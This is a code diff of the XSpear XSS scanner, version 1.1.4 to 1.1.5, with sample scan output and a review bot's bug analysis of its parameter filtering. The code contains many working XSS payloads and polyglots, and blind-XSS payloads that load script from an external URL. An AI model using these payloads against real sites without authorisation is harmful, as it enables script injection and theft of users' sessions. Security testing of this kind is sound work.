<script>alert(45)</script>"},{"id":21,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"'\"><svg/onload=alert(45)>","description":"triggered <svg/onload=alert(45)>"},{"id":22,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"triggered <audio src onloadstart=alert(45)>"},{"id":23,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"triggered <marquee onstart=alert(45)>"},{"id":24,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert(45)\">","description":"triggered <details/open/ontoggle=\"alert(45)\">"}]}
226
+ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fffff" -v 1 -o json
227
+ {"starttime":"2019-08-14 23:58:12 +0900","endtime":"2019-08-14 23:58:44 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Found Server: nginx/1.4.1"},{"id":1,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not set HSTS"},{"id":2,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Content-Type: text/html"},{"id":3,"type":"LOW","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set X-Frame-Options"},{"id":4,"type":"MIDUM","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set CSP"},{"id":5,"type":"INFO","issue":"DYNAMIC ANALYSIS","method":"GET","param":"cat","payload":"XsPeaR\"","description":"Found SQL Error Pattern"},{"id":6,"type":"INFO","issue":"REFLECTED","method":"GET","param":"cat","payload":"rEfe6","description":"reflected parameter"},{"id":7,"type":"INFO","issue":"FILERD RULE","method":"GET","param":"cat","payload":"onhwul=64","description":"not filtered event handler on{any} pattern"},{"id":8,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"reflected XSS Code"},{"id":9,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<textarea autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":10,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<video/poster/onerror=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":11,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":12,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert`45`\">","description":"reflected HTML5 XSS 
Code"},{"id":13,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<select autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":14,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":15,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<input autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":16,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"\"><iframe/src=JavaScriPt:alert(45)>","description":"reflected XSS Code"},{"id":17,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<meter onmouseover=alert(45)>0</meter>","description":"reflected HTML5 XSS Code"},{"id":18,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<keygen autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":19,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"triggered <audio src onloadstart=alert(45)>"},{"id":20,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"triggered <marquee onstart=alert(45)>"},{"id":21,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert(45)\">","description":"triggered <details/open/ontoggle=\"alert(45)\">"},{"id":22,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"triggered <script>alert(45)</script>"},{"id":23,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"'\"><svg/onload=alert(45)>","description":"triggered <svg/onload=alert(45)>"}]}
211
228
  ```
212
229
 
213
230
  ## Usage on ruby code (gem library)
@@ -278,7 +295,7 @@ Common Callback Class
278
295
  - CallbackCheckHeaders
279
296
  - CallbackStringMatch
280
297
  - CallbackNotAdded
281
- etc...
298
+ - etc...
282
299
 
283
300
  ## Update
284
301
  if nomal user
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.1.4"
2
+ VERSION = "1.1.5"
3
3
  end
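--- a/data/lib/XSpear.rb
+++ b/data/lib/XSpear.rb
@@ -28,6 +28,8 @@ class XspearScan
 @blind_url = options['blind']
 @report = XspearRepoter.new @url, Time.now, (@data.nil? ? "GET" : "POST")
 @filtered_objects = {}
+@reflected_params = []
+@param_check_switch = 0
 end
 
 class ScanCallbackFunc
@@ -65,8 +67,10 @@ class XspearScan
 class CallbackNotAdded < ScanCallbackFunc
 def run
 if @response.body.include? @query
-time = Time.now
-puts '[I]'.blue + " [#{time.strftime('%H:%M:%S')}] [#{@response.code}/#{@response.message}] reflected #{@query}"
+if (@verbose.to_i > 1)
+time = Time.now
+puts '[I]'.blue + " [#{time.strftime('%H:%M:%S')}] [#{@response.code}/#{@response.message}] reflected #{@query}"
+end
 [false, true]
 else
 [false, "Not reflected #{@query}"]
@@ -421,32 +425,69 @@ class XspearScan
 ]
 
 
-log('s', 'creating a test query.')
+## [ Parameter Analysis ]
+log('s', 'analysis request..')
 r.push makeQueryPattern('x', '<script>alert(45)</script>', '<script>alert(45)</script>', 'i', "Found WAF", CallbackCheckWAF)
 r.push makeQueryPattern('s', '', '', 'i', "-", CallbackCheckHeaders)
 r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
 r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
+r = r.flatten
+r = r.flatten
+
+
+threads = []
+r.each_slice(@thread) do |jobs|
+jobs.map do |node|
+Thread.new do
+begin
+result, req, res = task(node[:query], node[:inject], node[:pattern], node[:callback])
+# p result.body
+if @verbose.to_i > 2
+log('d', "[#{res.code}/#{res.message}] #{node[:query]} in #{node[:inject]}\n[ Request ]\n#{req.to_hash.inspect}\n[ Response ]\n#{res.to_hash.inspect}")
+end
+if result[0]
+log(node[:category], "[#{res.code}/#{res.message}] "+(result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
+@report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
+@reflected_params.push node[:param]
+elsif (node[:callback] == CallbackNotAdded) && (result[1].to_s == "true")
+@filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
+elsif node[:type] != "d"
+log('d', "[#{res.code}/#{res.message}] '#{node[:param]}' "+(result[1]).to_s)
+end
+rescue => e
+end
+end
+end.each(&:join)
+end
+log('s',"creating a test query [for reflected #{@reflected_params.length} param + blind xss ]")
+@param_check_switch = false
+## [ XSS Scanning ]
+r = []
 # Check Special Char
 special_chars.each do |sc|
 r.push makeQueryPattern('f', "#{sc}XsPeaR", "#{sc}XsPeaR", 'i', "not filtered "+"#{sc}".blue, CallbackNotAdded)
 end
 
+
 # Check Event Handler
 r.push makeQueryPattern('f', '\"><xspear onhwul=64>', 'onhwul=64', 'i', "not filtered event handler "+"on{any} pattern".blue, CallbackStringMatch)
 event_handler.each do |ev|
 r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue, CallbackNotAdded)
 end
 
+
 # Check HTML Tag
 tags.each do |tag|
 r.push makeQueryPattern('f', "\">xsp<#{tag}>", "xsp<#{tag}>", 'i', "not filtered "+"<#{tag}>".blue, CallbackNotAdded)
 end
 
+
 # Check useful code
 useful_code.each do |c|
 r.push makeQueryPattern('f', "#{c}.xspear", "#{c}.xspear", 'i', "not filtered "+"'#{c}' code".blue, CallbackNotAdded)
 end
 
+
 # Check Common XSS Payloads
 onfocus_tags = [
 "input",
@@ -465,13 +506,15 @@ class XspearScan
 r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
 r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
 
+
 onfocus_tags.each do |t|
 r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
 end
 
+
 # Check Selenium Common XSS Payloads
 r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
-r.push makeQueryPattern('x', '"><svg onload = alert(45) >', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
+r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
 r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
 r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
 r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
@@ -479,49 +522,55 @@ class XspearScan
 r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
 r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
 
+
 # Check Selenium XSS Polyglot
 r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
 r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
 r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
 
 
+
+
 # Check Blind XSS Payload
 if !@blind_url.nil?
-r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
-r.push makeQueryPattern('f', "\"'><script>$.getScript('#{@blind_url}')</script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
-r.push makeQueryPattern('f', "\"'><svg onload=javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'#{@blind_url}\';d.body.appendChild(_)')>", "NOTDETECTED", 'i', "", CallbackNotAdded)
-r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "NOTDETECTED", 'i', "", CallbackNotAdded)
+r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
+r.push makeQueryPattern('f', "\"'><script>$.getScript('#{@blind_url}')</script>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
+r.push makeQueryPattern('f', "\"'><svg onload=javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'#{@blind_url}\';d.body.appendChild(_)')>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
+r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
 end
 
+
 r = r.flatten
 r = r.flatten
 log('s', "test query generation is complete. [#{r.length} query]")
-log('s', "starting test and analysis. [#{@thread} threads]")
+log('s', "starting XSS Scanning. [#{@thread} threads]")
+
 
 threads = []
 r.each_slice(@thread) do |jobs|
 jobs.map do |node|
 Thread.new do
 begin
-result, req, res = task(node[:query], node[:inject], node[:pattern], node[:callback])
-# p result.body
-if @verbose.to_i > 2
-log('d', "[#{res.code}/#{res.message}] #{node[:query]} in #{node[:inject]}\n[ Request ]\n#{req.to_hash.inspect}\n[ Response ]\n#{res.to_hash.inspect}")
-end
-if result[0]
-log(node[:category], "[#{res.code}/#{res.message}] "+(result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
-@report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
-elsif (node[:callback] == CallbackNotAdded) && (result[1].to_s == "true")
-@filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
-else
-log('d', "[#{res.code}/#{res.message}] '#{node[:param]}' "+(result[1]).to_s)
-end
+result, req, res = task(node[:query], node[:inject], node[:pattern], node[:callback])
+# p result.body
+if @verbose.to_i > 2
+log('d', "[#{res.code}/#{res.message}] #{node[:query]} in #{node[:inject]}\n[ Request ]\n#{req.to_hash.inspect}\n[ Response ]\n#{res.to_hash.inspect}")
+end
+if result[0]
+log(node[:category], "[#{res.code}/#{res.message}] "+(result[1]).to_s.yellow+"[param: #{node[:param]}][#{node[:desc]}]")
+@report.add_issue(node[:category],node[:type],node[:param],node[:query],node[:pattern],node[:desc])
+elsif (node[:callback] == CallbackNotAdded) && (result[1].to_s == "true")
+@filtered_objects[node[:param].to_s].nil? ? (@filtered_objects[node[:param].to_s] = [node[:pattern].to_s]) : (@filtered_objects[node[:param].to_s].push(node[:pattern].to_s))
+elsif node[:type] != "f"
+log('d', "[#{res.code}/#{res.message}] '#{node[:param]}' "+(result[1]).to_s)
+end
 rescue => e
 end
 end
 end.each(&:join)
 end
 
+
 @report.set_filtered @filtered_objects
 @report.set_endtime
 log('s', "finish scan. the report is being generated..")
@@ -555,19 +604,7 @@ class XspearScan
 begin
 params = URI.decode_www_form(uri.query)
 params.each do |p|
-if @params.nil? || (@params.include? p[0] if !@params.nil?)
-attack = ""
-dparams = params
-dparams.each do |d|
-attack = uri.query.sub "#{d[0]}=#{d[1]}","#{d[0]}=#{d[1]}#{URI::encode(payload)}" if p[0] == d[0]
-#d[1] = p[1] + payload if p[0] == d[0]
-end
-result.push("inject": 'url',"param":p[0] ,"type": type, "query": attack, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
-end
-end
-unless @data.nil?
-params = URI.decode_www_form(@data)
-params.each do |p|
+if (@param_check_switch) || (@reflected_params.include? p[0]) || pattern == "BLINDNOTDETECTED"
 if @params.nil? || (@params.include? p[0] if !@params.nil?)
 attack = ""
 dparams = params
@@ -575,7 +612,23 @@ class XspearScan
 attack = uri.query.sub "#{d[0]}=#{d[1]}","#{d[0]}=#{d[1]}#{URI::encode(payload)}" if p[0] == d[0]
 #d[1] = p[1] + payload if p[0] == d[0]
 end
-result.push("inject": 'body', "param":p[0], "type": type, "query": attack, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
+result.push("inject": 'url',"param":p[0] ,"type": type, "query": attack, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
+end
+end
+end
+unless @data.nil?
+params = URI.decode_www_form(@data)
+params.each do |p|
+if !@param_check_switch || (@reflected_params.include? p)
+if @params.nil? || (@params.include? p[0] if !@params.nil?)
+attack = ""
+dparams = params
+dparams.each do |d|
+attack = uri.query.sub "#{d[0]}=#{d[1]}","#{d[0]}=#{d[1]}#{URI::encode(payload)}" if p[0] == d[0]
+#d[1] = p[1] + payload if p[0] == d[0]
+end
+result.push("inject": 'body', "param":p[0], "type": type, "query": attack, "pattern": pattern, "desc": desc, "category": category, "callback": callback)
+end
 end
 end
 end
@@ -586,7 +639,6 @@ class XspearScan
 end
 end
 
-
 def task(query, injected, pattern, callback)
 begin
 uri = URI.parse(@url)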
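Review bot: The two branches of the new parameter filter in makeQueryPattern disagree: the URL branch reads `if (@param_check_switch) || (@reflected_params.include? p[0]) || pattern == "BLINDNOTDETECTED"`, but the body branch reads `if !@param_check_switch || (@reflected_params.include? p)`, which is inverted, drops the blind-XSS exemption, and compares the `[name, value]` pair `p` instead of `p[0]`, so it can never match a recorded parameter name. Since `initialize` sets `@param_check_switch = 0` and `0` is truthy in Ruby, the switch starts on, which means POST-body parameters appear to be skipped entirely during the analysis phase (so they are never added to `@reflected_params`) and then all scanned afterwards regardless of reflection once the switch is set to `false`. I would initialise it as `@param_check_switch = true` and make the body branch read `if @param_check_switch || (@reflected_params.include? p[0]) || pattern == "BLINDNOTDETECTED"`, so both request locations follow the same two-phase rule. Separately, `@reflected_params.push node[:param]` runs from several threads; MRI's GVL makes this work in practice, but guarding it with a `Mutex` (or collecting results per thread and merging after `join`) would make the intent explicit. makeQueryPattern begins before and ends after the hunks shown here.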
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.1.4
4
+ version: 1.1.5
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2019-08-08 00:00:00.000000000 Z
11
+ date: 2019-08-14 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: colorize